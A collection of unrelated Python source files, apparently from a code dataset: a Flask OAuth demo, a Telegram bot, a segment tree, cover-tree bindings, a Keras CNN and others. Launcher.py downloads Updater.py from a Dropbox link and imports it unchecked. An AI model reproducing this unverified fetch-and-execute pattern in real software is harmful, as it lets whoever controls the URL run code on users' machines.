Private_Message.get_message_by_id(message_id)\n users_id = the_message.user_from\n user = User.get_by_id(users_id)\n return user\n\n @classmethod\n def all_new_messages(cls, user_id) -> List[\"Private_Message\"]:\n with get_connection() as connection:\n messages = Database.get_my_new_mail(connection, user_id)\n return [cls(message[3], message[4], message[5], message[6], message[0], message[1], message[2]) for message in messages]\n\n @classmethod\n def all_saved_messages(cls, user_id) -> List[\"Private_Message\"]:\n with get_connection() as connection:\n messages = Database.get_my_saved_mail(connection, user_id)\n return [cls(message[3], message[4], message[5], message[6], message[0], message[1], message[2]) for message in messages]\n\n\n @classmethod\n def delete_message(cls, message_id):\n with get_connection() as connection:\n message = Private_Message.get_message_by_id(message_id)\n Database.delete_private_message(connection, message_id)","sub_path":"V9/models/private_message.py","file_name":"private_message.py","file_ext":"py","file_size_in_byte":3985,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"563653718","text":"\"\"\"\nFlask application. Modeled in part on https://requests-oauthlib.readthedocs.org/en/latest/#overview\n\nThis is a demonstration application, only. 
This is not the recommended way to handle secret info in production,\n and contains minimal error handling at best.\n\"\"\"\n__author__ = 'andyboughton'\n\nimport os\n\nfrom flask import Flask, abort, redirect, request, session, url_for\nimport furl\nimport requests\nfrom requests_oauthlib import OAuth2Session\n\nimport settings\n\n\napp = Flask(__name__, static_folder='bower_components')\n\n\n#### Utility functions\ndef token_updater(token):\n \"\"\"Store the newest version of the token\"\"\"\n session['oauth_token'] = token\n\n\ndef get_request_client(token_dict):\n \"\"\"\n DRY request client\n :param token_dict: Token data returned from OAuth server (including access and refresh tokens)\n :return: Preconfigured oauth2 client\n \"\"\"\n refresh_kwargs = {'client_id': settings.CLIENT_ID,\n 'client_secret': settings.CLIENT_SECRET,\n 'redirect_uri': settings.CALLBACK_URL}\n\n client = OAuth2Session(settings.CLIENT_ID,\n redirect_uri=settings.CALLBACK_URL,\n token=token_dict,\n auto_refresh_url=settings.TOKEN_REFRESH_URL,\n auto_refresh_kwargs=refresh_kwargs,\n token_updater=token_updater)\n return client\n\n\n#### API Handlers\ndef api_v2_url(path_str,\n params=None,\n base_route=settings.API_BASE_URL,\n **kwargs):\n \"\"\"\n Convenience function for APIv2 usage: Concatenates parts of the absolute API url based on arguments provided\n\n For example: given path_str = '/nodes/abcd3/contributors/' and params {'filter[fullname]': 'bob'},\n this function would return the following on the local staging environment:\n 'http://localhost:8000/nodes/abcd3/contributors/?filter%5Bfullname%5D=bob'\n\n This is NOT a full lookup function. It does not verify that a route actually exists to match the path_str given.\n \"\"\"\n params = params or {} # Optional params dict for special-character param names, eg filter[fullname]\n\n base_url = furl.furl(base_route)\n sub_url = furl.furl(path_str)\n\n base_url.path.add(sub_url.path.segments)\n\n base_url.args.update(params)\n base_url.args.update(kwargs)\n return str(base_url)\n\n\nclass ApiV2(object):\n \"\"\"\n Mock class for OSF APIv2 calls. 
Can pass in a preconfigured client for OAuth usage.\n\n :param client: A `requests`-like object for making API calls.\n \"\"\"\n def __init__(self, client=None):\n self.client = client or requests\n\n def get_user_id(self):\n url = api_v2_url(\"/users/me\")\n res = self.client.get(url)\n data = res.json()['data']\n\n return data['id']\n\n def get_projects_count(self, filters=None):\n url = api_v2_url('/users/me/nodes', params=filters)\n res = self.client.get(url)\n return res.json()['links']['meta']['total']\n\n\n#### Routes\n@app.route('/', methods=['GET'])\ndef home():\n \"\"\"Display auth screen, or redirect to the action, as appropriate\"\"\"\n token = session.get('oauth_token')\n if token is None:\n return redirect(url_for('login'))\n return redirect(url_for('graph_projects'))\n\n\n@app.route('/login/', methods=['GET'])\ndef login():\n osf = OAuth2Session(client_id=settings.CLIENT_ID, redirect_uri=settings.CALLBACK_URL)\n authorization_url, state = osf.authorization_url(settings.AUTH_BASE_URL, approval_prompt='force')\n session['oauth_state'] = state\n return redirect(authorization_url)\n\n\n@app.route('/callback/', methods=['GET'])\ndef callback():\n \"\"\"The oauth app redirects the user here; perform logic to fetch access token and redirect to a target url\"\"\"\n osf = OAuth2Session(settings.CLIENT_ID, redirect_uri=settings.CALLBACK_URL, state=session['oauth_state'])\n auth_response = request.url\n\n # TODO: The token request fails (with CAS errors) when redirect_uri is not specified; is this a CAS bug?\n token = osf.fetch_token(settings.TOKEN_REQUEST_URL,\n client_secret=settings.CLIENT_SECRET,\n authorization_response=auth_response,\n verify=settings.REQUIRE_HTTPS)\n\n token_updater(token)\n return redirect(url_for(\"graph_projects\"))\n\n\n@app.route('/graph/', methods=['GET'])\ndef graph_projects():\n \"\"\"If the user is logged in and has registered an access token, perform queries\"\"\"\n token = session.get('oauth_token')\n if token is None:\n # Login page indirectly redirects here; don't create a circular redirect.\n abort(403)\n\n client = get_request_client(token)\n api = ApiV2(client=client)\n\n public_count = api.get_projects_count(filters={'filter[public]': 'true'})\n private_count = api.get_projects_count(filters={'filter[public]': 'false'})\n\n # TODO: Make this a graph\n return \"You're logged in! You have {} public and {} private projects\".format(public_count, private_count)\n\n\nif __name__ == '__main__':\n # For local development *only*: disable the HTTPS requirement. Don't do this in production. 
Really.\n app.config.from_pyfile('settings.py')\n if settings.REQUIRE_HTTPS is False:\n os.environ['DEBUG'] = '1'\n os.environ['OAUTHLIB_INSECURE_TRANSPORT'] = '1'\n\n app.run(port=5001)\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5390,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"47711194","text":"'''\nCreated on Jan 17, 2016\n\n@author: peter\n'''\ndef factor(number):\n factorNumber = number//2\n while factorNumber >2:\n if number % factorNumber == 0:\n if isPrime(factorNumber):\n return factorNumber\n factorNumber = factorNumber - 1\ndef isPrime(n):\n checkNumber = n//2\n while checkNumber > 1:\n if n % checkNumber == 0:\n return False\n checkNumber = checkNumber -1\n return True\nprint (factor(600851475143))","sub_path":"EulerProj/problem1.py","file_name":"problem1.py","file_ext":"py","file_size_in_byte":482,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"30888054","text":"# -*- coding: utf-8 -*-\n\nimport telegram\nimport gettext\nimport logging\n\nfrom telegram import InlineKeyboardButton, InlineKeyboardMarkup\nfrom telegram.ext import CommandHandler, CallbackQueryHandler\n\nen = gettext.translation('en', localedir='locale', languages=['en'])\nde = gettext.translation('de', localedir='locale', languages=['de'])\nLANGUAGES=( 'de' , 'en' )\n\nlogger = logging.getLogger(__name__)\n\nen.install()\nbuttons = {}\nbuttons[\"test\"] = InlineKeyboardButton(_(\"MENU:TEST\"), callback_data='menu_test') \nbuttons[\"de\"] = InlineKeyboardButton(_(\"MENU:CONF:language:de\"), callback_data='language_de')\nbuttons[\"en\"] = InlineKeyboardButton(_(\"MENU:CONF:language:en\"), callback_data='language_en')\n\nkeyboard = {}\nkeyboard[\"en_start\"] = InlineKeyboardMarkup(\n [\n [ buttons[\"de\"] , buttons[\"en\"]],\n [ buttons[\"test\"] ],\n ]\n )\nde.install()\nbuttons = {}\nbuttons[\"test\"] = InlineKeyboardButton(_(\"MENU:TEST\"), callback_data='menu_test') \nbuttons[\"de\"] =InlineKeyboardButton(_(\"MENU:CONF:language:de\"), callback_data='language_de')\nbuttons[\"en\"] =InlineKeyboardButton(_(\"MENU:CONF:language:en\"), callback_data='language_en')\n\nkeyboard[\"de_start\"] = InlineKeyboardMarkup(\n [\n [ buttons[\"de\"] , buttons[\"en\"]],\n [ buttons[\"test\"] ],\n ]\n )\n\nen.install()\n\n\nclass Skeleton(object):\n def __init__(self):\n self.handlers = [\n CommandHandler('start', self.start),\n CallbackQueryHandler(pattern='^language_', callback=self.languages),\n CallbackQueryHandler(callback=self.menu),\n ]\n\n def menu(self,bot, update):\n query = update.callback_query\n chat_id = query.message.chat_id\n message_id=query.message.message_id\n reply_markup = keyboard[\"en_start\"]\n bot.editMessageText(\n text=_(\"STARTMENU\") ,\n chat_id=chat_id,\n message_id=message_id,\n parse_mode=telegram.ParseMode.MARKDOWN,\n reply_markup=reply_markup\n )\n\n def start(self,bot,update):\n reply_markup = keyboard[\"en_start\"]\n bot.sendMessage(\n text=_(\"MENU\") ,\n chat_id=update.message.chat_id,\n parse_mode=telegram.ParseMode.MARKDOWN,\n reply_markup=reply_markup\n )\n\n def languages(self,bot,update):\n query = update.callback_query\n lang = query.data.split(\"_\")[1]\n if lang == \"de\" :\n de.install()\n elif lang == \"en\" :\n en.install()\n lang_keyboard =\"%s_start\" % lang\n\n print(\"language: %s - keyboard: %s\" % (lang , lang_keyboard))\n\n reply_markup=keyboard[lang_keyboard]\n\n bot.editMessageText(\n text=_(\"LANGUAGE CHANGE IN *%s*\") % lang 
,\n chat_id=query.message.chat_id,\n message_id=query.message.message_id,\n parse_mode=telegram.ParseMode.MARKDOWN,\n reply_markup=reply_markup\n )\n\n def get_handlers(self):\n return self.handlers\n","sub_path":"modules/skeleton.py","file_name":"skeleton.py","file_ext":"py","file_size_in_byte":3180,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"417777247","text":"from typing import List, Union\n\nfrom battle.businesslogic.effects.Effect import Effect\nfrom battle.businesslogic.effects.EffectFactory import EffectFactory\nfrom cards.models import Card, CardEffect\nfrom .Buff import Buff\n\n\nclass BattleCard:\n \"\"\"\n\n \"\"\"\n\n def __init__(self, card_model: Card):\n \"\"\"\n Creates BattleCard instance.\n @param card_model: Database model.\n \"\"\"\n\n self.card_model = card_model\n\n effects_factory = EffectFactory.get_instance()\n self.effects = []\n for effect_model in card_model.effects.all():\n self.effects.append(effects_factory.create(effect_model))\n\n self.turns_blocked = 0\n\n def use(self) -> List[Effect]:\n \"\"\"\n Updates card's buffs and returns list of card's effects to be executed in battle simulation.\n @return: List of effects to be executed by battle simulator.\n \"\"\"\n\n self._update_effects()\n\n if self.turns_blocked > 0:\n self.turns_blocked -= 1\n return [] # If card is blocked it should be executed without effects.\n\n return self.effects\n\n def _update_effects(self) -> None:\n for effect in self.effects:\n effect.update()\n\n def assign_buff(self, buff: Buff, effect_type: Union[CardEffect.EffectId, None] = None):\n \"\"\"\n This method assigns a buff to this card's appropriate effects.\n @param: buff - Buff instance\n @param: effect_type - Enum that will determine which effect will be boosted\n \"\"\"\n for effect in self.effects:\n # We check if any of the effects if of the type specified in the parameter\n # If we specified none, it applies to all effect types.\n card_type = effect.effect_model.card_effect.id\n if effect_type is None or card_type == effect_type:\n effect.add_buff(buff)\n","sub_path":"WMIAdventure/backend/WMIAdventure_backend/battle/businesslogic/BattleCard.py","file_name":"BattleCard.py","file_ext":"py","file_size_in_byte":1893,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"638592462","text":"from PySide.QtCore import QRectF,QPointF,Qt\nfrom PySide.QtGui import QPainterPath, QFont\n\nclass Style(object):\n @staticmethod\n def roundedRectPath(x,y,width,height,\n TLRX,TLRY, TRRX,TRRY,\n BLRX,BLRY, BRRX,BRRY):\n right = x + width\n bottom = y + height\n \n if TLRX <= 0: TLRX = 0.1\n if TLRY <= 0: TLRY = 0.1\n if TRRX <= 0: TRRX = 0.1\n if TRRY <= 0: TRRY = 0.1 # path cannot handle 0\n if BLRX <= 0: BLRX = 0.1 # as rounding values\n if BLRY <= 0: BLRY = 0.1\n if BRRX <= 0: BRRX = 0.1\n if BRRY <= 0: BRRY = 0.1\n \n path = QPainterPath(QPointF(x,y))\n \n path.arcTo(x, y,\n TLRX * 2.0, TLRY * 2.0,\n 180.0, -90.0);\n \n path.arcTo(right - TRRX * 2.0, y,\n TRRX * 2.0, TRRY * 2.0,\n 90.0, -90.0);\n \n path.arcTo(right - BRRX * 2.0, bottom - BRRY * 2.0,\n BRRX * 2.0, BRRY * 2.0,\n 0.0 , -90.0);\n path.arcTo(x, bottom - BLRY * 2.0,\n BLRX * 2.0, BLRY * 2.0,\n -90.0, -90.0);\n \n path.closeSubpath()\n \n return path\n \n @staticmethod\n def BasicRect(painter,widget):\n# widgetRect = QRectF(0,0,widget.width(),widget.height()).adjusted(0.5,0.5,-0.5,-0.5)\n \n painter.setPen(Qt.NoPen)\n \n borderpath = Style.roundedRectPath(0,\n 0,\n 
widget.width(),\n widget.height(),\n \n widget.topLeftRoundingX(), widget.topLeftRoundingY(),\n widget.topRightRoundingX(), widget.topRightRoundingY(),\n widget.bottomLeftRoundingX(), widget.bottomLeftRoundingY(),\n widget.bottomRightRoundingX(), widget.bottomRightRoundingY())\n \n painter.setBrush(widget.borderColor())\n painter.drawPath(borderpath)\n \n bgpath = Style.roundedRectPath(0 + widget.leftBorderWidth(),\n 0 + widget.topBorderWidth(),\n widget.width() - widget.leftBorderWidth() - widget.rightBorderWidth(),\n widget.height() - widget.topBorderWidth() - widget.bottomBorderWidth(),\n \n widget.topLeftRoundingX(), widget.topLeftRoundingY(),\n widget.topRightRoundingX(), widget.topRightRoundingY(),\n widget.bottomLeftRoundingX(), widget.bottomLeftRoundingY(),\n widget.bottomRightRoundingX(), widget.bottomRightRoundingY())\n \n painter.setBrush(widget.color())\n painter.drawPath(bgpath)\n \n @staticmethod\n def PlainText(painter,widget):\n painter.setPen(widget.textColor())\n \n font = QFont()\n font.setPixelSize(widget.fontSize())\n \n font.setOverline(widget.overline())\n font.setUnderline(widget.underlined())\n font.setItalic(widget.italic())\n font.setStrikeOut(widget.strikeOut())\n \n font.setWeight(widget.fontWeight())\n font.setFamily(widget.fontFamily())\n font.setCapitalization( QFont.Capitalization(widget.textTransform()) )\n \n font.setStretch(widget.fontStretch())\n font.setLetterSpacing(QFont.SpacingType(widget.letterSpacingType()), widget.letterSpacing())\n font.setWordSpacing(widget.wordSpacing())\n \n painter.setFont(font)\n \n painter.drawText(0,0,100,100,widget.textAlignment(),widget.text())\n \n @staticmethod\n def paintWidget(painter,widget):\n for func in widget.styleOptions:\n func(painter,widget) # call each style option\n \n \n \n \n ","sub_path":"style.py","file_name":"style.py","file_ext":"py","file_size_in_byte":4320,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"214331359","text":"import urllib.request\nimport os\nversion=0\nactualVersion=0\ndef VersionCheck(version,actualVersion):\n try:\n t=open(\"LauncherVersion.version\",\"r\")\n t.close()\n except IOError:\n t = open(\"LauncherVersion.version\",\"w\")\n t.write(\"0\")\n t.close\n with open(\"LauncherVersionCheck.version\",'wb') as f:\n r=urllib.request.urlopen(\"https://dl.dropbox.com/s/k50358q0ztyhp84/LauncherVersion.txt?dl=1\").read()\n f.write(r)\n f.close()\n t=open(\"LauncherVersion.version\")\n version=(t.readline())\n t.close()\n f=open(\"LauncherVersionCheck.version\")\n actualVersion=(f.readline())\n f.close\n if version!=actualVersion:\n print(\"Your Updater isnt actual enough.\")\n print(\"Start Download Updater\")\n f= open(\"Updater.py\",'wb')\n r=urllib.request.urlopen(\"https://dl.dropbox.com/s/1sknewxxqhal2hs/Updater.py?dl=1\").read()\n f.write(r)\n f.close()\n f=open('LauncherVersion.version', 'w')\n f.write(actualVersion)\n f.close\n f=open('LauncherVersion.version','r')\n f.close\n print(\"Updater Download finished\")\n if version==actualVersion:\n print(\"Updater got the actual Version.\")\nVersionCheck(version,actualVersion)\nos.system('cls' if os.name=='nt' else 'clear')\nos.remove(\"LauncherVersionCheck.version\")\nimport Updater\n \n\n","sub_path":"Launcher.py","file_name":"Launcher.py","file_ext":"py","file_size_in_byte":1369,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"287161204","text":"class Node(object):\n def __init__(self, val, start, end):\n self.sum = 
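Launcher.py above writes `t.close` and `f.close` without parentheses, which only references the method and never closes the files. A context-manager sketch of the same version check (the example.com URL and both function names are placeholders, not the original Dropbox links):

import urllib.request

def read_local_version(path="LauncherVersion.version"):
    # 'with' guarantees close() runs even on error.
    try:
        with open(path) as f:
            return f.readline().strip()
    except FileNotFoundError:
        with open(path, "w") as f:
            f.write("0")
        return "0"

def fetch_remote_version(url="https://example.com/LauncherVersion.txt"):
    with urllib.request.urlopen(url) as resp:
        return resp.read().decode("utf-8").strip()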
val\n self.right, self.left = None, None\n self.range = [start, end]\n\n\nclass SegementTree(object):\n def __init__(self, size):\n self.root = self._build_segment_tree(0, size - 1)\n\n def _build_segment_tree(self, start, end):\n if start > end:\n return None\n node = Node(0, start, end)\n if start == end:\n return node\n mid = (start + end) // 2\n node.left, node.right = self._build_segment_tree(start, mid), self._build_segment_tree(mid + 1, end)\n return node\n\n def update(self, index, val, root=None):\n root = root or self.root\n if index < root.range[0] or index > root.range[1]:\n return\n root.sum += val\n if index == root.range[0] == root.range[1]:\n return\n self.update(index, val, root.left)\n self.update(index, val, root.right)\n\n def range_sum(self, start, end, root=None):\n root = root or self.root\n if end < root.range[0] or start > root.range[1]:\n return 0\n if start <= root.range[0] and end >= root.range[1]:\n return root.sum\n return self.range_sum(start, end, root.left) + self.range_sum(start, end, root.right)\n\n\nclass NumArray(object):\n def __init__(self, nums):\n self.nums = nums\n self.segment_tree = SegementTree(len(nums))\n for index, num in enumerate(nums):\n self.segment_tree.update(index, num)\n\n def update(self, i, val):\n diff = val - self.nums[i]\n self.segment_tree.update(i, diff)\n self.nums[i] = val\n\n def sumRange(self, i, j):\n return self.segment_tree.range_sum(i, j)\n","sub_path":"307/307.range-sum-query-mutable.233033079.Accepted.leetcode.py","file_name":"307.range-sum-query-mutable.233033079.Accepted.leetcode.py","file_ext":"py","file_size_in_byte":1741,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"517221736","text":"\"\"\"\nCopyright (c) 2021 The authors of SG Tree All rights reserved.\n\nInitially modified from cover_tree.py of CoverTree\nhttps://github.com/manzilzaheer/CoverTree\nCopyright (c) 2017 Manzil Zaheer All rights reserved.\n\nLicensed under the Apache License, Version 2.0 (the \"License\");\nyou may not use this file except in compliance with the License.\nYou may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n\"\"\"\n\nimport pickle\nimport numpy as np\n\nimport covertreec\n\n\nclass Node(object):\n \"\"\"CoverTree node from c++.\"\"\"\n base_vars = ['this', 'uid', 'level', 'point', 'maxdistUB']\n\n def __init__(self, this):\n info = covertreec.node_property(this)\n info['this'] = this\n if info['others']:\n others = pickle.loads(info['others'])\n info.update(others)\n del info['others']\n self.__dict__ = info\n\n @property\n def children(self):\n return [Node(child) for child in covertreec.node_children(self.this)]\n\n def __setattr__(self, name, value):\n if name not in self.base_vars:\n super(Node, self).__setattr__(name, value)\n props = {k: v for k, v in vars(self).items() if k not in self.base_vars}\n if props:\n covertreec.node_save(self.this, pickle.dumps(props))\n else:\n print('Cannot set {}'.format(name))\n\nclass NNS_L2(object):\n \"\"\"CoverTree Class for NN search in Euclidean distance.\"\"\"\n\n def __init__(self, this):\n if isinstance(this, tuple):\n self.this = this[0]\n self.root = Node(this[1])\n elif 
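A quick check of the NumArray wrapper defined above, using the classic Range Sum Query example (this usage snippet is mine; the class itself is unchanged):

arr = NumArray([1, 3, 5])
print(arr.sumRange(0, 2))  # 9
arr.update(1, 2)           # nums becomes [1, 2, 5]
print(arr.sumRange(0, 2))  # 8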
isinstance(this, int):\n self.this = this\n self.root = None\n else:\n raise NotImplementedError('this pointer should be int or tuple')\n\n def __del__(self):\n covertreec.delete(self.this)\n\n def __reduce__(self):\n buff = self.serialize()\n return (NNS_L2.from_string, (buff,))\n \n def __len__(self):\n return covertreec.size(self.this)\n\n @classmethod\n def from_matrix(cls, points, trunc=-1, use_multi_core=-1):\n ptr = covertreec.new(points, trunc, use_multi_core)\n return cls(ptr)\n\n @classmethod\n def from_string(cls, buff):\n ptr = covertreec.deserialize(buff)\n return cls(ptr)\n\n def insert(self, point, uid=None, use_multi_core=-1):\n if len(point.shape) == 1:\n return covertreec.insert(self.this, point, -1 if uid is None else uid)\n elif len(point.shape) == 2:\n if uid is None:\n N = covertreec.size(self.this)\n uid = np.arange(N, N + point.shape[0])\n return covertreec.batchinsert(self.this, point, uid, use_multi_core)\n else:\n print(\"Points to be inserted should be 1D or 2D matrix!\")\n\n def remove(self, point):\n return covertreec.remove(self.this, point)\n\n def NearestNeighbour(self, points, use_multi_core=-1, return_points=False):\n return covertreec.NearestNeighbour(self.this, points, use_multi_core,\n return_points)\n\n def kNearestNeighbours(self,\n points,\n k=10,\n use_multi_core=-1,\n return_points=False):\n return covertreec.kNearestNeighbours(self.this, points, k, use_multi_core,\n return_points)\n\n def RangeSearch(self,\n points,\n r=1.0,\n use_multi_core=-1,\n return_points=False):\n return covertreec.RangeSearch(self.this, points, r, use_multi_core,\n return_points)\n\n def serialize(self):\n return covertreec.serialize(self.this)\n\n def display(self):\n return covertreec.display(self.this)\n\n def stats(self):\n return covertreec.stats(self.this)\n\n def test_covering(self):\n return covertreec.test_covering(self.this)\n \n def test_nesting(self):\n return covertreec.test_nesting(self.this)\n\n def spreadout(self, k):\n return covertreec.spreadout(self.this, k)\n \n def get_root(self):\n return Node(covertreec.get_root(self.this))\n\nclass MIPS(NNS_L2):\n \"\"\"CoverTree Class for maximum inner product search.\"\"\"\n\n def __init__(self, this, phi2):\n super(MIPS, self).__init__(this)\n self.phi2 = phi2\n\n def __reduce__(self):\n buff = self.serialize()\n return (MIPS.from_string, (buff, self.phi2))\n \n def __len__(self):\n return covertreec.size(self.this)\n\n @classmethod\n def from_matrix(cls, points, trunc=-1, user_max=None, use_multi_core=-1):\n # Find norm of points\n norm2 = (points**2).sum(1)\n phi2 = np.max(norm2) if user_max is None else user_max\n modified_points = np.hstack((points, np.sqrt(phi2 - norm2)[:, np.newaxis]))\n ptr = covertreec.new(modified_points, trunc, use_multi_core)\n return cls(ptr, phi2)\n\n @classmethod\n def from_string(cls, buff, phi2):\n ptr = covertreec.deserialize(buff)\n return cls(ptr, phi2)\n\n def insert(self, point, uid=None, use_multi_core=-1):\n if len(point.shape) == 1:\n norm2 = np.dot(point, point)\n modified_point = np.append(point, np.sqrt(self.phi2 - norm2))\n return covertreec.insert(self.this, modified_point, -1 if uid is None else uid)\n elif len(point.shape) == 2:\n if uid is None:\n N = covertreec.size(self.this)\n uid = np.arange(N, N + point.shape[0])\n norm2 = (point**2).sum(1)\n modified_points = np.hstack((point, np.sqrt(self.phi2 - norm2)[:, np.newaxis]))\n return covertreec.batchinsert(self.this, modified_points, uid, use_multi_core)\n else:\n print(\"Points to be inserted should be 1D or 2D 
matrix!\")\n\n def remove(self, point):\n norm2 = np.dot(point, point)\n modified_point = np.append(point, np.sqrt(self.phi2 - norm2))\n return covertreec.remove(self.this, modified_point)\n\n def NearestNeighbour(self, points, use_multi_core=-1, return_points=False):\n modified_points = np.hstack(\n (points, np.zeros((points.shape[0], 1), dtype=points.dtype)))\n ret_val = list(\n covertreec.NearestNeighbour(self.this, modified_points, use_multi_core,\n return_points))\n norm2 = (points**2).sum(1)\n ret_val[1] = 0.5 * (self.phi2 + norm2 - ret_val[1]**2)\n return tuple(ret_val)\n\n def kNearestNeighbours(self,\n points,\n k=10,\n use_multi_core=-1,\n return_points=False):\n \"\"\"main nearest neighbor function.\"\"\"\n modified_points = np.hstack(\n (points, np.zeros((points.shape[0], 1), dtype=points.dtype)))\n import time \n st_t = time.time()\n ret_val = list(\n covertreec.kNearestNeighbours(self.this, modified_points, k,\n use_multi_core, return_points))\n st_e = time.time()\n norm2 = (points**2).sum(1)[:, np.newaxis]\n ret_val[1] = 0.5 * (self.phi2 + norm2 - ret_val[1]**2)\n return tuple(ret_val)\n\n def RangeSearch(self,\n points,\n r=1.0,\n use_multi_core=-1,\n return_points=False):\n raise NotImplementedError('Range for MIPS not clear')\n\nclass MCSS(NNS_L2):\n \"\"\"CoverTree Class for NN search in cosine distance.\"\"\"\n\n def __init__(self, this):\n super(MCSS, self).__init__(this)\n\n def __reduce__(self):\n buff = self.serialize()\n return (MCSS.from_string, (buff,))\n\n @classmethod\n def from_matrix(cls, points, trunc=-1, use_multi_core=-1):\n # Find norm of points\n norm = np.sqrt((points**2).sum(1))\n modified_points = points / norm[:, np.newaxis]\n ptr = covertreec.new(modified_points, trunc, use_multi_core)\n return cls(ptr)\n\n @classmethod\n def from_string(cls, buff):\n ptr = covertreec.deserialize(buff)\n return cls(ptr)\n\n def insert(self, point):\n norm = np.sqrt(np.dot(point, point))\n modified_point = point / norm\n return covertreec.insert(self.this, modified_point)\n\n def remove(self, point):\n norm = np.sqrt(np.dot(point, point))\n modified_point = point / norm\n return covertreec.remove(self.this, modified_point)\n\n def NearestNeighbour(self, points, use_multi_core=-1, return_points=False):\n ret_val = list(\n covertreec.NearestNeighbour(self.this, points, use_multi_core,\n return_points))\n norm = np.sqrt((points**2).sum(1))\n ret_val[1] = 0.5 * (1.0 / norm + norm - ret_val[1]**2 / norm)\n return tuple(ret_val)\n\n def kNearestNeighbours(self,\n points,\n k=10,\n use_multi_core=-1,\n return_points=False):\n \"\"\"main nearest neighbor function.\"\"\"\n ret_val = list(\n covertreec.kNearestNeighbours(self.this, points, k, use_multi_core,\n return_points))\n norm = np.sqrt((points**2).sum(1))[:, np.newaxis]\n ret_val[1] = 0.5 * (1.0 / norm + norm - ret_val[1]**2 / norm)\n return tuple(ret_val)\n\n def RangeSearch(self,\n points,\n r=1.0,\n use_multi_core=-1,\n return_points=False):\n raise NotImplementedError('Range for MIPS not clear')\n","sub_path":"graphgrove/covertree.py","file_name":"covertree.py","file_ext":"py","file_size_in_byte":9323,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"286725410","text":"\"\"\"Convolutional NN similar to VGG for use with KerasLearner.\"\"\"\nimport numpy as np\nfrom keras.models import Sequential, Model\nfrom keras.layers import Dense, Dropout, Flatten\nfrom keras.layers import Conv2D, MaxPooling2D\nfrom keras.layers import Input, Convolution2D, 
concatenate\n\n\ndef keras_dnn_ws(d_img, d_ws, d_act):\n \"\"\"\n d_img, d_ws are input dimensions (tuples)\n \"\"\"\n # CNN with vision input\n inp_img = Input(shape=d_img, name='input_img')\n conv_1 = Convolution2D(32, (3, 3), padding='same', activation='relu',\n name='conv_1')(inp_img)\n conv_2 = Convolution2D(32, (3, 3), padding='same', activation='relu',\n name='conv_2')(conv_1)\n pool_1 = MaxPooling2D(pool_size=(2, 2), name='pool_1')(conv_2)\n\n conv_3 = Convolution2D(64, (3, 3), padding='same', activation='relu',\n name='conv_3')(pool_1)\n conv_4 = Convolution2D(64, (3, 3), padding='same', activation='relu',\n name='conv_4')(conv_3)\n pool_2 = MaxPooling2D(pool_size=(2, 2), name='pool_2')(conv_4)\n\n conv_5 = Convolution2D(128, (3, 3), padding='same', activation='relu',\n name='conv_5')(pool_2)\n conv_6 = Convolution2D(128, (3, 3), padding='same', activation='relu',\n name='conv_6')(conv_5)\n pool_3 = MaxPooling2D(pool_size=(2, 2), name='pool_3')(conv_6)\n\n flat = Flatten()(pool_3)\n fc_1 = Dense(512, activation='relu', name='fully_connected_1')(flat)\n drop_1 = Dropout(0.5, name='dropout_1')(fc_1)\n fc_2 = Dense(256, activation='relu', name='fully_connected_2')(drop_1)\n drop_2 = Dropout(0.25, name='dropout_2')(fc_2)\n\n # feedforward (fully-connected) network with wheel speed input\n inp_ws = Input(shape=[d_ws], name='input_ws')\n fc_ws_1 = Dense(64, activation='relu', name='fully_connected_ws')(inp_ws)\n\n # concatenate two models\n concat = concatenate([drop_2, fc_ws_1], name='concatenate')\n fc_3 = Dense(128, activation='relu', name='fully_connected_3')(concat)\n drop_3 = Dropout(0.25, name='dropout_3')(fc_3)\n out_u = Dense(d_act, activation='linear', name='output_action')(drop_3)\n\n model = Model(inputs=[inp_img, inp_ws], outputs=out_u)\n\n return model\n","sub_path":"scripts/nn.py","file_name":"nn.py","file_ext":"py","file_size_in_byte":2261,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"50054516","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nfrom queue import Queue, Empty\nfrom threading import Thread\nfrom nanomsg import Socket, PAIR, SUB, PUB, PUSH,SUB_SUBSCRIBE, AF_SP,SOL_SOCKET,RCVTIMEO\nfrom datetime import datetime\nimport os\n\nfrom .datastruct import *\n\n\nclass ClientMq(object):\n def __init__(self, config, ui_event_engine, outgoing_quue):\n self._ui_event_engine = ui_event_engine\n self._outgoing_quue = outgoing_quue\n self._config = config\n\n self._active = False\n self._thread = Thread(target=self._run)\n\n def _run(self):\n # os.system(\"taskset -cp 5 %d \" % os.getpid())\n while self._active:\n try:\n # response msg from server\n msgin = self._recv_sock.recv(flags=0)\n msgin = msgin.decode(\"utf-8\")\n if msgin is not None and msgin.index('|') > 0:\n print('client rec broker msg:',msgin,'at ', datetime.now())\n if msgin[-1] == '\\0':\n msgin = msgin[:-1]\n if msgin[-1] == '\\x00':\n msgin = msgin[:-1]\n v = msgin.split('|')\n msg2type = MSG_TYPE(int(v[2]))\n if msg2type == MSG_TYPE.MSG_TYPE_TICK_L1:\n m = TickEvent()\n m.deserialize(msgin)\n self._ui_event_engine.put(m) \n elif msg2type == MSG_TYPE.MSG_TYPE_RTN_ORDER:\n m = OrderStatusEvent()\n m.deserialize(msgin)\n self._ui_event_engine.put(m)\n elif msg2type == MSG_TYPE.MSG_TYPE_RTN_TRADE:\n m = FillEvent()\n m.deserialize(msgin)\n self._ui_event_engine.put(m)\n elif msg2type == 